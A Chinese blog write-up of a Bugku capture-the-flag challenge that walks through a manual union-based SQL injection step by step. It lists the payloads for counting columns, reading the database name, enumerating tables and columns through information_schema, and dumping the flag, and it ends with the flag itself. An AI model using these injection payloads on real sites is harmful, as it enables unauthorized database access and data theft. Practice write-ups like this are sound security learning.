刚刚做了bugku的题目,现在整理一下
写出解题思路,希望能够帮助到那些需要帮助的人
所有的wp都是以一题一篇的形式写出
主要是为了能够让读者更好的阅读以及查找,
希望你们不要责怪!!共勉!!
解题思路:首先按照上面的提示输入:1,2,3
由此可以看出这一是一道手工注入的题目:
我们先手遍历一遍 id=-1' union select 1,2,3,4#
发现有四个表且都有回显
于是 就开始爆破吧
首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag
然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到表名:fl4g,sc
接下来我们就要暴字段了
通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#
得到字段skctf_flag
最后就是查询数据了,通过使用:id=-1' union select 1,2,3,skctf_flag from fl4g#
最后得到答案:BUGKU{Sql_INJECT0N_4813drd8hz4}
您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力。
作者:落花四月
关于作者:潜心于网络安全学习。如有问题或建议,请多多赐教!
版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接.
特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!